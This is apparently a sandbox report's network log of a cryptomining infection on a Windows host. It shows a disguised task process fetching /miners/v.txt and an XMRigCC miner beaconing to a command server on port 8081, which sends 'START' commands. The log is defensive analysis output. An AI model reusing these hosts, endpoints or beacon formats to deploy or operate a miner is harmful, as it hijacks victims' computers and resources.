                                                                                                                                                                                                  Dec 8, 2024 23:06:04.719192028 CET808150040185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:06:04.719371080 CET500408081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:06:04.838746071 CET808150040185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:06:05.945744038 CET808150040185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:06:05.945918083 CET808150040185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:06:05.946163893 CET500408081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:06:05.950229883 CET500408081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:06:06.069525003 CET808150040185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:06:08.152604103 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:06:08.365968943 CET4973581192.168.2.4185.17.0.139

                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                  • 45.137.64.40
                                                                                                                                                                                                  • 185.17.0.139:8081

                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  0192.168.2.44973845.137.64.40803272C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:02:26.520373106 CET155OUTGET /miners/v.txt HTTP/1.1
                                                                                                                                                                                                  Host: 45.137.64.40
                                                                                                                                                                                                  User-Agent: python-requests/2.28.1
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Connection: keep-alive


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  1192.168.2.449739185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:02:33.225963116 CET307OUTPOST /client/setClientConfig?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 3462
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:02:34.584167004 CET249INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  2192.168.2.449740185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:02:34.708420992 CET307OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 2780
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:02:36.064941883 CET282INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  3192.168.2.449742185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:02:43.254406929 CET306OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 908
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:02:44.728347063 CET282INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  4192.168.2.449744185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:02:53.474147081 CET307OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 1020
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:02:54.819288015 CET334INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer
                                                                                                                                                                                                  Data Raw: 7b 22 63 6f 6e 74 72 6f 6c 5f 63 6f 6d 6d 61 6e 64 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 53 54 41 52 54 22 2c 22 70 61 79 6c 6f 61 64 22 3a 22 22 7d 7d
                                                                                                                                                                                                  Data Ascii: {"control_command":{"command":"START","payload":""}}


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  5192.168.2.449752185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:03:04.176217079 CET307OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 1020
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:03:05.513887882 CET282INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  6192.168.2.449773185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:03:13.734752893 CET307OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 1279
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:03:15.226041079 CET282INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  7192.168.2.449795185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:03:24.451493979 CET307OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 1047
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:03:25.791791916 CET282INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  8192.168.2.449820185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:03:33.834790945 CET306OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 933
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:03:35.344357014 CET282INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  9192.168.2.449842185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:03:43.833611012 CET306OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 933
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:03:45.172362089 CET282INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  10192.168.2.449863185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:03:54.578732967 CET307OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 1160
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:03:55.916826963 CET282INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  11192.168.2.449888185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:04:03.994983912 CET306OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 934
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:04:05.495356083 CET334INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer
                                                                                                                                                                                                  Data Raw: 7b 22 63 6f 6e 74 72 6f 6c 5f 63 6f 6d 6d 61 6e 64 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 53 54 41 52 54 22 2c 22 70 61 79 6c 6f 61 64 22 3a 22 22 7d 7d
                                                                                                                                                                                                  Data Ascii: {"control_command":{"command":"START","payload":""}}


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  12192.168.2.449909185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:04:14.032143116 CET307OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 1148
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:04:15.378420115 CET282INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  13192.168.2.449930185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:04:24.004045963 CET307OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 1058
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:04:25.403692007 CET282INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  14192.168.2.449951185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:04:34.004443884 CET307OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 1058
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:04:35.380561113 CET282INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  15192.168.2.449972185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:04:44.017105103 CET306OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 944
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:04:45.436894894 CET282INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  16192.168.2.449999185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:04:54.032911062 CET306OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 944
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:04:55.520282984 CET282INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  17192.168.2.450021185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:05:04.037138939 CET306OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 945
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:05:05.397495985 CET282INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  18192.168.2.450028185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:05:14.037316084 CET307OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 1035
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:05:15.377557993 CET282INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  19192.168.2.450030185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:05:24.099725008 CET306OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 944
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  Host: 185.17.0.139:8081
                                                                                                                                                                                                  User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
                                                                                                                                                                                                  Dec 8, 2024 23:05:25.513113976 CET282INHTTP/1.1 200 OK
                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  20192.168.2.450033185.17.0.13980812044C:\Windows\Tasks\ApplicationsFrameHost.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Dec 8, 2024 23:05:34.095611095 CET307OUTPOST /client/setClientStatus?clientId=124406 HTTP/1.1
                                                                                                                                                                                                  Accept: *//*
                                                                                                                                                                                                  Accept: application/json
                                                                                                                                                                                                  Authorization: Bearer mySecret
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Length: 1058
                                                                                                                                                                                                  Content-Type: application/json
